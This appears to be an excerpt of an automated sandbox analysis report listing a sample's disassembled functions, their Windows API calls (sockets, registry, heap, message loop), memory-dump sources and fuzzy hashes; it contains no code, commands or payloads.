                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                        • String ID:
                                        • API String ID: 3633006590-0
                                        • Opcode ID: 69423686cb5a6d58befd11eabba671f88f73680d0f96b7b62800f1c965aa12cc
                                        • Instruction ID: ace3d380cc94c66541baabfda11e598d26b5a3a8ec18531d223c24b4b8c20cb1
                                        • Opcode Fuzzy Hash: 69423686cb5a6d58befd11eabba671f88f73680d0f96b7b62800f1c965aa12cc
                                        • Instruction Fuzzy Hash: 0E21D2657413189ADF246774EC5EBEE33ACAF01310F204565E625C30E2EB2CDE849B54
                                        Function 007C9122 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007CACD3: inet_addr.WS2_32(00000000), ref: 007CACF5
                                        • socket.WS2_32(00000002,00000001,00000006,?,?,00000000), ref: 007C9160
                                        • WSAGetLastError.WS2_32(00000000), ref: 007C916F
                                        • connect.WS2_32(00000000,?,00000010), ref: 007C918B
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ErrorLastconnectinet_addrsocket
                                        • String ID:
                                        • API String ID: 3701255441-0
                                        • Opcode ID: 4c6104737f2a4d67e37d3ce60987902075d3356b562b4593adc0e1eecdfcbecd
                                        • Instruction ID: e67fd800033d4b8a457c9c6b1a8b503d0df8120ca0abd9c93955c33d63623236
                                        • Opcode Fuzzy Hash: 4c6104737f2a4d67e37d3ce60987902075d3356b562b4593adc0e1eecdfcbecd
                                        • Instruction Fuzzy Hash: 5B215131240215AFDB10BF68CC9EF7E77A9EF49724F08845DF9169B392DA78AC018761
                                        Function 00773A67 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                        Download Yara Rule
                                        APIs
                                        • SHGetMalloc.SHELL32(1<w), ref: 00773A7D
                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 00773AD2
                                        • SHGetDesktopFolder.SHELL32(?), ref: 00773A8F
                                          • Part of subcall function 00773B1E: _wcsncpy.LIBCMT ref: 00773B32
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: DesktopFolderFromListMallocPath_wcsncpy
                                        • String ID: 1<w
                                        • API String ID: 3981382179-1736100821
                                        • Opcode ID: 1ddf1c5f4a2f217228f594de835b6f7a825b3fe45e95878108b5e5935f3ad072
                                        • Instruction ID: 25be928cb47ca8187a98b89ffaee4e6f074805185df0be9c1d72ed0d04a34296
                                        • Opcode Fuzzy Hash: 1ddf1c5f4a2f217228f594de835b6f7a825b3fe45e95878108b5e5935f3ad072
                                        • Instruction Fuzzy Hash: 48219276B00114ABCB24DF95DC88DEEB7BEEF88750B1084A4F509D7250DB349E46DB94
                                        Function 0078C955 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0078C948,SwapMouseButtons,00000004,?), ref: 0078C979
                                        • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,0078C948,SwapMouseButtons,00000004,?,?,?,?,0078BF22), ref: 0078C99A
                                        • RegCloseKey.KERNEL32(00000000,?,?,0078C948,SwapMouseButtons,00000004,?,?,?,?,0078BF22), ref: 0078C9BC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID: Control Panel\Mouse
                                        • API String ID: 3677997916-824357125
                                        • Opcode ID: b9d3e1ba4eedcd78c1b8c6ca0996367167f9ddfd3a0bbe5ed0e99405de487725
                                        • Instruction ID: a8e2e6793a794a0490598450be9e288ae561fefa65d02d03c473c22d3fbfa773
                                        • Opcode Fuzzy Hash: b9d3e1ba4eedcd78c1b8c6ca0996367167f9ddfd3a0bbe5ed0e99405de487725
                                        • Instruction Fuzzy Hash: 65117C75551218FFDB229F64DC48EAE77B8EF04750F00849AF941E7210E635AE40DB64
                                        Function 007AA8C8 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aab94bef7967c6cc3f2ee8217cff4c1f974a54f36afbaafac4d8e591283643f5
                                        • Instruction ID: 0ac330b1ce1ccbe2c34e1b88199a3cd6bdb3d8b3c857e4fa2e42c70e5769e4de
                                        • Opcode Fuzzy Hash: aab94bef7967c6cc3f2ee8217cff4c1f974a54f36afbaafac4d8e591283643f5
                                        • Instruction Fuzzy Hash: 84C17075A00216EFCB14CF94C984EAEB7B5FF89710F108699E901EB251D734EE41DBA1
                                        Function 0077131C Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 159COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007716F2: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00771751
                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0077159B
                                        • CoInitialize.OLE32(00000000), ref: 00771612
                                        • CloseHandle.KERNEL32(00000000), ref: 007E58F7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Handle$ClipboardCloseFormatInitializeRegister
                                        • String ID: '/{
                                        • API String ID: 458326420-394795438
                                        • Opcode ID: 8bae7086d8d247fb3a9d72421d6383f19b189f7c5c2837e123ad65b21ac39870
                                        • Instruction ID: a07c555ea26fbbce694d64ef3ba20c56c67ce49e1040eb905a3db3232fab45f5
                                        • Opcode Fuzzy Hash: 8bae7086d8d247fb3a9d72421d6383f19b189f7c5c2837e123ad65b21ac39870
                                        • Instruction Fuzzy Hash: 5171CCB4901240CBCF10EFAAB8DD454BBA6FBD8B44798892ED10AC7362DB784448CF59
                                        Function 007BCC82 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007741A7: _fseek.LIBCMT ref: 007741BF
                                          • Part of subcall function 007BCE59: _wcscmp.LIBCMT ref: 007BCF49
                                          • Part of subcall function 007BCE59: _wcscmp.LIBCMT ref: 007BCF5C
                                        • _free.LIBCMT ref: 007BCDC9
                                        • _free.LIBCMT ref: 007BCDD0
                                        • _free.LIBCMT ref: 007BCE3B
                                          • Part of subcall function 007928CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00798715,00000000,007988A3,00794673,?), ref: 007928DE
                                          • Part of subcall function 007928CA: GetLastError.KERNEL32(00000000,?,00798715,00000000,007988A3,00794673,?), ref: 007928F0
                                        • _free.LIBCMT ref: 007BCE43
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                        • String ID:
                                        • API String ID: 1552873950-0
                                        • Opcode ID: aae9b6d307097e5c95e800f3d48533f281671ab1ca06387605bf2f2c615f8bb0
                                        • Instruction ID: e12fd589b6027dae2fdde28612596033006a291adbe7bdceb1b81f976f67ad5a
                                        • Opcode Fuzzy Hash: aae9b6d307097e5c95e800f3d48533f281671ab1ca06387605bf2f2c615f8bb0
                                        • Instruction Fuzzy Hash: F6514AB1A04218EFDF15AF64DC85BAEBBB9BF08340F1040AEB219A3251D7755A808F19
                                        Function 00771E58 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 00771E87
                                          • Part of subcall function 007738E4: _memset.LIBCMT ref: 00773965
                                          • Part of subcall function 007738E4: _wcscpy.LIBCMT ref: 007739B5
                                          • Part of subcall function 007738E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 007739C6
                                        • KillTimer.USER32(?,00000001), ref: 00771EDC
                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00771EEB
                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007E4526
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                        • String ID:
                                        • API String ID: 1378193009-0
                                        • Opcode ID: d5d78cc44f1c2e14f6187afae3ea1cacee20dec739aa6a2ae819fd036f6028ea
                                        • Instruction ID: fc6d97692ab8b11edd2f740b91871d9681211b305805390bee706221621d5ba5
                                        • Opcode Fuzzy Hash: d5d78cc44f1c2e14f6187afae3ea1cacee20dec739aa6a2ae819fd036f6028ea
                                        • Instruction Fuzzy Hash: 1E21F9719057C4AFEB3287298859FEBBBEC9B05348F44448DE69E56241C3B86A84CB51
                                        Function 007C92C0 Relevance: 6.1, APIs: 4, Instructions: 60networkCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0078F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,007BAEA5,?,?,00000000,00000008), ref: 0078F282
                                          • Part of subcall function 0078F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,007BAEA5,?,?,00000000,00000008), ref: 0078F2A6
                                        • gethostbyname.WS2_32(?), ref: 007C92F0
                                        • WSAGetLastError.WS2_32(00000000), ref: 007C92FB
                                        • _memmove.LIBCMT ref: 007C9328
                                        • inet_ntoa.WS2_32(?), ref: 007C9333
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                        • String ID:
                                        • API String ID: 1504782959-0
                                        • Opcode ID: ddd5ab69aa5983f305d4898c9d35eea005388ba5f96925a64073213c1825d398
                                        • Instruction ID: 63f66c4ef636524075d8998d2a1b8f94ab6782dc3e975c8e8486ab56a18910cf
                                        • Opcode Fuzzy Hash: ddd5ab69aa5983f305d4898c9d35eea005388ba5f96925a64073213c1825d398
                                        • Instruction Fuzzy Hash: 12116075500109EFCF15FBA0CD5ADEE77B9EF08355B108069F506A72A2DB38AE14CB61
                                        Function 0079010A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007945EC: __FF_MSGBANNER.LIBCMT ref: 00794603
                                          • Part of subcall function 007945EC: __NMSG_WRITE.LIBCMT ref: 0079460A
                                          • Part of subcall function 007945EC: RtlAllocateHeap.NTDLL(01750000,00000000,00000001), ref: 0079462F
                                        • std::exception::exception.LIBCMT ref: 0079013E
                                        • __CxxThrowException@8.LIBCMT ref: 00790153
                                          • Part of subcall function 00797495: RaiseException.KERNEL32(?,?,0077125D,00826598,?,?,?,00790158,0077125D,00826598,?,00000001), ref: 007974E6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                        • String ID: bad allocation
                                        • API String ID: 3902256705-2104205924
                                        • Opcode ID: 75e954204fc14346494f01ad7447d854c297c20fc17e613ac954fd0615eb6414
                                        • Instruction ID: 8e637f6f7999b32f10d2410e91bd2bbae00d9cd3e721399cf96c4911438d0e4d
                                        • Opcode Fuzzy Hash: 75e954204fc14346494f01ad7447d854c297c20fc17e613ac954fd0615eb6414
                                        • Instruction Fuzzy Hash: CBF0A43515421DEBCF15ABA8FC0A9EE77E9AF04350F104425F90492282DBB8DE91D6E5
                                        Function 007CF79F Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 75df7e54dac81bc37e5e3d42343bc2d11a52a49c0ca835784a3825cbcfe08c2f
                                        • Instruction ID: da5da4abc9d62d4b4295704c9523f3576bcd6d27fbe6ae14094f48db3678383f
                                        • Opcode Fuzzy Hash: 75df7e54dac81bc37e5e3d42343bc2d11a52a49c0ca835784a3825cbcfe08c2f
                                        • Instruction Fuzzy Hash: 09F17C71608701DFCB20DF24C884B5AB7E5FF88314F10892EF9999B292D779E905CB82
                                        Function 007E8071 Relevance: 4.8, APIs: 3, Instructions: 266COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ClearVariant_memmove
                                        • String ID:
                                        • API String ID: 19560607-0
                                        • Opcode ID: cdc6312ea7aa740c11c5261ec8e0c05896aded99863048b04d170c513883cf61
                                        • Instruction ID: a256ef6b0ed8346088a7460bd4e6a91429e76183eb630910087ec45ab253e7b9
                                        • Opcode Fuzzy Hash: cdc6312ea7aa740c11c5261ec8e0c05896aded99863048b04d170c513883cf61
                                        • Instruction Fuzzy Hash: 6DA1AF74A4060ADFCB24EF58C884AADF7B1FF44710F548529E859AB351E739ED82CB90
                                        Function 0077C610 Relevance: 4.6, APIs: 3, Instructions: 125COMMON
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0077C00E,?,?,?,?,00000010), ref: 0077C627
                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00000010), ref: 0077C65F
                                        • _memmove.LIBCMT ref: 0077C697
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$_memmove
                                        • String ID:
                                        • API String ID: 3033907384-0
                                        • Opcode ID: 30270ef2d54cf756af3919b06ba24d2341b0a0b812a13adee07036c3b84bd360
                                        • Instruction ID: 75a245e78618b564ba148561247e63f7f3f350ce91bcc2931333e4ab9dd0de21
                                        • Opcode Fuzzy Hash: 30270ef2d54cf756af3919b06ba24d2341b0a0b812a13adee07036c3b84bd360
                                        • Instruction Fuzzy Hash: 7531E8B2201201AFDF249F24D84AA2BB7D9EF48350F10853DF95EC7290EA36E8108791
                                        Function 007945EC Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __FF_MSGBANNER.LIBCMT ref: 00794603
                                          • Part of subcall function 00798E52: __NMSG_WRITE.LIBCMT ref: 00798E79
                                          • Part of subcall function 00798E52: __NMSG_WRITE.LIBCMT ref: 00798E83
                                        • __NMSG_WRITE.LIBCMT ref: 0079460A
                                          • Part of subcall function 00798EB2: GetModuleFileNameW.KERNEL32(00000000,00830312,00000104,?,00000001,00790127), ref: 00798F44
                                          • Part of subcall function 00798EB2: ___crtMessageBoxW.LIBCMT ref: 00798FF2
                                          • Part of subcall function 00791D65: ___crtCorExitProcess.LIBCMT ref: 00791D6B
                                          • Part of subcall function 00791D65: ExitProcess.KERNEL32 ref: 00791D74
                                          • Part of subcall function 0079889E: __getptd_noexit.LIBCMT ref: 0079889E
                                        • RtlAllocateHeap.NTDLL(01750000,00000000,00000001), ref: 0079462F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                        • String ID:
                                        • API String ID: 1372826849-0
                                        • Opcode ID: b7512655cebfcc8f291a5a20bd9e08eb7b361437510e7aad3de80a2e9dcb4bd2
                                        • Instruction ID: 475bb3be5f9dbf04d088e73909dc65f6dd176e7f5120ac569c088c3dc2514823
                                        • Opcode Fuzzy Hash: b7512655cebfcc8f291a5a20bd9e08eb7b361437510e7aad3de80a2e9dcb4bd2
                                        • Instruction Fuzzy Hash: F1019271601601EAEE203B75BC56F2A2758AB83761F110529F905DB582DFBCDC428A66
                                        Function 0077E60E Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • TranslateMessage.USER32(?), ref: 0077E646
                                        • DispatchMessageW.USER32(?), ref: 0077E651
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0077E664
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
